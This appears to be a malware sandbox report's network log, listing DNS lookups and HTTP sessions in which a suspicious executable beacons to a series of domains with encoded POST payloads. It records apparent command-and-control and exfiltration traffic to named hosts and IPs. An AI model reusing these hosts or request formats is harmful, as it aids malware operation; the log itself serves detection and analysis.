                                                                                                                          Nov 22, 2024 15:11:58.251892090 CET5089853192.168.2.41.1.1.1
                                                                                                                          Nov 22, 2024 15:11:59.108841896 CET53508981.1.1.1192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:15.682492971 CET5373253192.168.2.41.1.1.1
                                                                                                                          Nov 22, 2024 15:12:16.693375111 CET5373253192.168.2.41.1.1.1
                                                                                                                          Nov 22, 2024 15:12:17.708441019 CET5373253192.168.2.41.1.1.1
                                                                                                                          Nov 22, 2024 15:12:17.709532022 CET53537321.1.1.1192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:17.709544897 CET53537321.1.1.1192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:17.847310066 CET53537321.1.1.1192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:32.197459936 CET5375553192.168.2.41.1.1.1
                                                                                                                          Nov 22, 2024 15:12:33.193315983 CET5375553192.168.2.41.1.1.1
                                                                                                                          Nov 22, 2024 15:12:33.508055925 CET53537551.1.1.1192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:33.508091927 CET53537551.1.1.1192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:48.009655952 CET5952653192.168.2.41.1.1.1
                                                                                                                          Nov 22, 2024 15:12:48.320563078 CET53595261.1.1.1192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:02.728444099 CET5325453192.168.2.41.1.1.1
                                                                                                                          Nov 22, 2024 15:13:03.226109028 CET53532541.1.1.1192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:17.540354967 CET5219053192.168.2.41.1.1.1
                                                                                                                          Nov 22, 2024 15:13:18.069550991 CET53521901.1.1.1192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:32.633945942 CET6333653192.168.2.41.1.1.1
                                                                                                                          Nov 22, 2024 15:13:33.550337076 CET53633361.1.1.1192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:48.196897984 CET5727153192.168.2.41.1.1.1
                                                                                                                          Nov 22, 2024 15:13:49.209069014 CET5727153192.168.2.41.1.1.1
                                                                                                                          Nov 22, 2024 15:13:49.219446898 CET53572711.1.1.1192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:49.346273899 CET53572711.1.1.1192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:07.150473118 CET5373153192.168.2.41.1.1.1
                                                                                                                          Nov 22, 2024 15:14:07.481879950 CET53537311.1.1.1192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:22.025902033 CET5776453192.168.2.41.1.1.1
                                                                                                                          Nov 22, 2024 15:14:22.640059948 CET53577641.1.1.1192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:36.994895935 CET4976653192.168.2.41.1.1.1
                                                                                                                          Nov 22, 2024 15:14:37.517791986 CET53497661.1.1.1192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:52.010452032 CET5524853192.168.2.41.1.1.1
                                                                                                                          Nov 22, 2024 15:14:53.021421909 CET5524853192.168.2.41.1.1.1
                                                                                                                          Nov 22, 2024 15:14:53.300595999 CET53552481.1.1.1192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:53.300635099 CET53552481.1.1.1192.168.2.4
                                                                                                                          Nov 22, 2024 15:15:07.794466019 CET5527653192.168.2.41.1.1.1
                                                                                                                          Nov 22, 2024 15:15:08.016758919 CET53552761.1.1.1192.168.2.4
                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Nov 22, 2024 15:11:58.251892090 CET192.168.2.41.1.1.10x93e6Standard query (0)www.cyperla.xyzA (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:12:15.682492971 CET192.168.2.41.1.1.10x78e9Standard query (0)www.cstrategy.onlineA (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:12:16.693375111 CET192.168.2.41.1.1.10x78e9Standard query (0)www.cstrategy.onlineA (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:12:17.708441019 CET192.168.2.41.1.1.10x78e9Standard query (0)www.cstrategy.onlineA (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:12:32.197459936 CET192.168.2.41.1.1.10xa0f8Standard query (0)www.madhf.techA (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:12:33.193315983 CET192.168.2.41.1.1.10xa0f8Standard query (0)www.madhf.techA (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:12:48.009655952 CET192.168.2.41.1.1.10x875bStandard query (0)www.bser101pp.buzzA (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:13:02.728444099 CET192.168.2.41.1.1.10x5b4aStandard query (0)www.goldstarfootwear.shopA (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:13:17.540354967 CET192.168.2.41.1.1.10xa17bStandard query (0)www.070002018.xyzA (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:13:32.633945942 CET192.168.2.41.1.1.10xa39bStandard query (0)www.bienmaigrir.infoA (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:13:48.196897984 CET192.168.2.41.1.1.10x96afStandard query (0)www.yc791022.asiaA (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:13:49.209069014 CET192.168.2.41.1.1.10x96afStandard query (0)www.yc791022.asiaA (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:14:07.150473118 CET192.168.2.41.1.1.10x1f6fStandard query (0)www.jalan2.onlineA (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:14:22.025902033 CET192.168.2.41.1.1.10x9dc1Standard query (0)www.beyondfitness.liveA (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:14:36.994895935 CET192.168.2.41.1.1.10x8e18Standard query (0)www.dietcoffee.onlineA (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:14:52.010452032 CET192.168.2.41.1.1.10xa6cdStandard query (0)www.smartcongress.netA (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:14:53.021421909 CET192.168.2.41.1.1.10xa6cdStandard query (0)www.smartcongress.netA (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:15:07.794466019 CET192.168.2.41.1.1.10xaabbStandard query (0)www.alihones.lolA (IP address)IN (0x0001)false
                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Nov 22, 2024 15:11:59.108841896 CET1.1.1.1192.168.2.40x93e6No error (0)www.cyperla.xyzcyperla.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:11:59.108841896 CET1.1.1.1192.168.2.40x93e6No error (0)cyperla.xyz31.186.11.114A (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:12:17.709532022 CET1.1.1.1192.168.2.40x78e9No error (0)www.cstrategy.onlinecstrategy.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:12:17.709532022 CET1.1.1.1192.168.2.40x78e9No error (0)cstrategy.online194.76.119.60A (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:12:17.709544897 CET1.1.1.1192.168.2.40x78e9No error (0)www.cstrategy.onlinecstrategy.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:12:17.709544897 CET1.1.1.1192.168.2.40x78e9No error (0)cstrategy.online194.76.119.60A (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:12:17.847310066 CET1.1.1.1192.168.2.40x78e9No error (0)www.cstrategy.onlinecstrategy.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:12:17.847310066 CET1.1.1.1192.168.2.40x78e9No error (0)cstrategy.online194.76.119.60A (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:12:33.508055925 CET1.1.1.1192.168.2.40xa0f8No error (0)www.madhf.tech103.224.182.242A (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:12:33.508091927 CET1.1.1.1192.168.2.40xa0f8No error (0)www.madhf.tech103.224.182.242A (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:12:48.320563078 CET1.1.1.1192.168.2.40x875bNo error (0)www.bser101pp.buzz104.21.58.90A (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:12:48.320563078 CET1.1.1.1192.168.2.40x875bNo error (0)www.bser101pp.buzz172.67.158.106A (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:13:03.226109028 CET1.1.1.1192.168.2.40x5b4aNo error (0)www.goldstarfootwear.shopgoldstarfootwear.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:13:03.226109028 CET1.1.1.1192.168.2.40x5b4aNo error (0)goldstarfootwear.shop3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:13:03.226109028 CET1.1.1.1192.168.2.40x5b4aNo error (0)goldstarfootwear.shop15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:13:18.069550991 CET1.1.1.1192.168.2.40xa17bNo error (0)www.070002018.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:13:33.550337076 CET1.1.1.1192.168.2.40xa39bNo error (0)www.bienmaigrir.info35.220.176.144A (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:13:49.219446898 CET1.1.1.1192.168.2.40x96afNo error (0)www.yc791022.asia101.35.209.183A (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:13:49.346273899 CET1.1.1.1192.168.2.40x96afNo error (0)www.yc791022.asia101.35.209.183A (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:14:07.481879950 CET1.1.1.1192.168.2.40x1f6fNo error (0)www.jalan2.onlinejalan2.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:14:07.481879950 CET1.1.1.1192.168.2.40x1f6fNo error (0)jalan2.online108.181.189.7A (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:14:22.640059948 CET1.1.1.1192.168.2.40x9dc1No error (0)www.beyondfitness.live209.74.77.107A (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:14:37.517791986 CET1.1.1.1192.168.2.40x8e18No error (0)www.dietcoffee.online77.68.64.45A (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:14:53.300595999 CET1.1.1.1192.168.2.40xa6cdNo error (0)www.smartcongress.netsmartcongress.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:14:53.300595999 CET1.1.1.1192.168.2.40xa6cdNo error (0)smartcongress.net146.88.233.115A (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:14:53.300635099 CET1.1.1.1192.168.2.40xa6cdNo error (0)www.smartcongress.netsmartcongress.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:14:53.300635099 CET1.1.1.1192.168.2.40xa6cdNo error (0)smartcongress.net146.88.233.115A (IP address)IN (0x0001)false
                                                                                                                          Nov 22, 2024 15:15:08.016758919 CET1.1.1.1192.168.2.40xaabbName error (3)www.alihones.lolnonenoneA (IP address)IN (0x0001)false
                                                                                                                          • www.cyperla.xyz
                                                                                                                          • www.cstrategy.online
                                                                                                                          • www.madhf.tech
                                                                                                                          • www.bser101pp.buzz
                                                                                                                          • www.goldstarfootwear.shop
                                                                                                                          • www.070002018.xyz
                                                                                                                          • www.bienmaigrir.info
                                                                                                                          • www.yc791022.asia
                                                                                                                          • www.jalan2.online
                                                                                                                          • www.beyondfitness.live
                                                                                                                          • www.dietcoffee.online
                                                                                                                          • www.smartcongress.net
                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.44974331.186.11.114803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:11:59.254071951 CET354OUTGET /qygv/?o6=SpTPojpx7H&Mr60=PNgLNtFNavTWVACgmh5xCzkhObl4Vn/3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4Wmu6EeWsOoRA0CokgLA8hMNXivrFO8nzFLsU= HTTP/1.1
                                                                                                                          Host: www.cyperla.xyz
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-us
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Nov 22, 2024 15:12:00.626995087 CET1236INHTTP/1.1 404 Not Found
                                                                                                                          Connection: close
                                                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                          pragma: no-cache
                                                                                                                          content-type: text/html
                                                                                                                          content-length: 1251
                                                                                                                          date: Fri, 22 Nov 2024 14:12:00 GMT
                                                                                                                          server: LiteSpeed
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                                                          Nov 22, 2024 15:12:00.627018929 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                                                                          Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.449784194.76.119.60803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:12:17.854099989 CET633OUTPOST /qx5d/ HTTP/1.1
                                                                                                                          Host: www.cstrategy.online
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.cstrategy.online
                                                                                                                          Content-Length: 201
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.cstrategy.online/qx5d/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 46 77 38 77 6f 52 36 55 79 51 6e 46 44 78 64 31 62 75 6c 54 34 6b 37 44 56 4f 49 66 61 65 35 6a 50 48 7a 4d 77 72 6e 39 48 44 47 43 56 42 75 2b 44 35 62 70 4c 42 73 74 51 71 57 68 42 33 79 6c 68 46 4e 78 2f 49 62 6b 2f 55 44 39 38 47 73 64 52 6d 4f 76 70 4a 50 58 54 2b 46 52 70 35 69 74 6d 37 77 76 4f 46 79 46 2b 4b 2b 33 47 6a 5a 32 30 4c 6e 65 68 76 4d 6a 55 33 2f 78 44 6b 50 43 58 70 57 4d 4f 6c 30 41 75 39 49 51 45 77 61 74 64 51 79 47 65 74 52 30 4e 36 6e 63 64 46 4a 65 59 7a 70 61 55 79 77 37 7a 6d 43 51 4b 68 4c 6d 35 4e 32 31 4b 6a 32 2f 5a 45 39 71 6c 4e 6c 49 5a 51 3d 3d
                                                                                                                          Data Ascii: Mr60=Fw8woR6UyQnFDxd1bulT4k7DVOIfae5jPHzMwrn9HDGCVBu+D5bpLBstQqWhB3ylhFNx/Ibk/UD98GsdRmOvpJPXT+FRp5itm7wvOFyF+K+3GjZ20LnehvMjU3/xDkPCXpWMOl0Au9IQEwatdQyGetR0N6ncdFJeYzpaUyw7zmCQKhLm5N21Kj2/ZE9qlNlIZQ==
                                                                                                                          Nov 22, 2024 15:12:19.214692116 CET391INHTTP/1.1 301 Moved Permanently
                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                          Date: Fri, 22 Nov 2024 14:12:18 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 178
                                                                                                                          Connection: close
                                                                                                                          Location: https://www.cstrategy.online/qx5d/
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.449790194.76.119.60803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:12:20.518194914 CET653OUTPOST /qx5d/ HTTP/1.1
                                                                                                                          Host: www.cstrategy.online
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.cstrategy.online
                                                                                                                          Content-Length: 221
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.cstrategy.online/qx5d/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 46 77 38 77 6f 52 36 55 79 51 6e 46 44 51 74 31 64 4a 78 54 2f 45 37 4d 4c 2b 49 66 50 75 35 5a 50 48 50 4d 77 71 7a 58 48 32 32 43 51 51 65 2b 45 34 62 70 49 42 73 74 66 4b 57 6b 63 48 7a 49 68 46 52 35 2f 4a 33 6b 2f 55 58 39 38 44 49 64 52 52 79 73 6f 5a 50 56 61 65 46 54 6e 5a 69 74 6d 37 77 76 4f 42 61 76 2b 4f 53 33 46 54 70 32 30 71 6e 64 6f 50 4d 67 64 58 2f 78 4a 45 50 34 58 70 57 79 4f 6b 70 64 75 2f 41 51 45 77 71 74 64 68 79 48 56 74 52 79 48 61 6e 49 54 6b 34 41 43 53 51 31 62 44 59 35 74 57 57 55 4c 6e 47 38 6f 38 58 69 59 6a 53 4d 45 44 30 65 6f 4f 59 42 43 63 39 57 74 70 71 57 2f 67 2f 2f 47 46 4e 2b 73 57 6d 6b 66 37 6b 3d
                                                                                                                          Data Ascii: Mr60=Fw8woR6UyQnFDQt1dJxT/E7ML+IfPu5ZPHPMwqzXH22CQQe+E4bpIBstfKWkcHzIhFR5/J3k/UX98DIdRRysoZPVaeFTnZitm7wvOBav+OS3FTp20qndoPMgdX/xJEP4XpWyOkpdu/AQEwqtdhyHVtRyHanITk4ACSQ1bDY5tWWULnG8o8XiYjSMED0eoOYBCc9WtpqW/g//GFN+sWmkf7k=
                                                                                                                          Nov 22, 2024 15:12:22.001300097 CET391INHTTP/1.1 301 Moved Permanently
                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                          Date: Fri, 22 Nov 2024 14:12:21 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 178
                                                                                                                          Connection: close
                                                                                                                          Location: https://www.cstrategy.online/qx5d/
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.449796194.76.119.60803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:12:23.175431967 CET10735OUTPOST /qx5d/ HTTP/1.1
                                                                                                                          Host: www.cstrategy.online
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.cstrategy.online
                                                                                                                          Content-Length: 10301
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.cstrategy.online/qx5d/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 46 77 38 77 6f 52 36 55 79 51 6e 46 44 51 74 31 64 4a 78 54 2f 45 37 4d 4c 2b 49 66 50 75 35 5a 50 48 50 4d 77 71 7a 58 48 33 69 43 4d 79 47 2b 43 62 6a 70 4a 42 73 74 57 71 57 6c 63 48 79 4b 68 46 4a 39 2f 4a 72 30 2f 57 76 39 75 56 55 64 58 6c 6d 73 69 5a 50 56 58 2b 46 53 70 35 6a 6c 6d 37 67 72 4f 46 2b 76 2b 4f 53 33 46 51 78 32 39 62 6e 64 6b 76 4d 6a 55 33 2f 44 44 6b 4f 32 58 76 2b 45 4f 6b 63 71 75 75 67 51 46 51 36 74 61 43 61 48 59 74 52 77 41 61 6d 50 54 6b 30 68 43 53 4d 54 62 44 63 58 74 55 4b 55 4c 52 6a 77 77 4d 48 49 4b 7a 43 32 51 52 6b 36 6c 2b 6b 33 44 64 38 32 6c 35 6a 4b 70 6a 44 70 4d 6c 4d 69 7a 30 54 6c 42 73 46 6b 77 6c 79 31 6f 49 36 62 59 31 76 4d 68 51 41 48 59 52 78 5a 72 50 67 61 6c 68 50 71 31 4b 37 33 46 44 67 6b 4d 2b 61 79 61 45 7a 77 33 6b 47 4d 2b 77 39 4a 45 2f 4a 33 30 75 53 73 78 71 4b 31 31 6e 4f 52 66 46 46 58 4b 48 2f 72 49 38 74 31 75 68 71 54 69 2f 5a 62 68 65 6e 48 64 65 66 37 31 6b 57 55 30 70 31 75 4d 6c 39 71 6a 54 31 4a 7a 78 66 76 56 [TRUNCATED]
                                                                                                                          Data Ascii: Mr60=Fw8woR6UyQnFDQt1dJxT/E7ML+IfPu5ZPHPMwqzXH3iCMyG+CbjpJBstWqWlcHyKhFJ9/Jr0/Wv9uVUdXlmsiZPVX+FSp5jlm7grOF+v+OS3FQx29bndkvMjU3/DDkO2Xv+EOkcquugQFQ6taCaHYtRwAamPTk0hCSMTbDcXtUKULRjwwMHIKzC2QRk6l+k3Dd82l5jKpjDpMlMiz0TlBsFkwly1oI6bY1vMhQAHYRxZrPgalhPq1K73FDgkM+ayaEzw3kGM+w9JE/J30uSsxqK11nORfFFXKH/rI8t1uhqTi/ZbhenHdef71kWU0p1uMl9qjT1JzxfvVPHusoz6hmgwFulBwOAv8miiqeVHnsxEkRpZGxh65FjVcoN/TyYMJFiyVZBWHufNj0upBKsXFK6BtJoNiRrC7gzktpy3Qfk9gnBbyWncHZKCwli+XuaXO6MBI4sm/QobP7mRwjOa0i6sCG+lXbR+xeDMR2MiS5M6tWBH09hDay4eyy1f8baiqS2XgTLq2HK0oevPNecfgvkjGyxNBPoJOWWc6PMuo/G2bHt2ACdAYaKJss4kMBAYe0MPbno2E7CO1qcf3zVjWMRMx22Vx5LdXIDqwb9BQUhucSyskPWCYKXVyEe7H0+hADkKx8zazcAtpv27yizRhut0FbF8Hu3faLF7XfzVzKidImtVJ412nI92U7F8JaB7CZV0BkjSv9b20njY5hTjy9IRBZEK5kENvH0b8+4tX8gOb6yNoLTGKoRmkqo4KuwOLAmIe/DFCXCB+PV55bbrkNRdrg6rkUqdgzuKDTmL1Z8lr7AJrWOm7GezDqx2qniRTlIJQgAFPKXom6l/0uy3bQjtwpRgr00S6DKAj9cpt9qvaGv/6If88GtfGic8mFl6SP5yy4VkNxNKA9ophKERjEAKiCtis5tOSc9jNny5tSb5R7garpqju3Q4nSsPwC49YYKbLkyTx7uw+tLgOU4/qBesCr/MaS0IEKzZBLszvaiUoZU [TRUNCATED]
                                                                                                                          Nov 22, 2024 15:12:24.484096050 CET391INHTTP/1.1 301 Moved Permanently
                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                          Date: Fri, 22 Nov 2024 14:12:24 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 178
                                                                                                                          Connection: close
                                                                                                                          Location: https://www.cstrategy.online/qx5d/
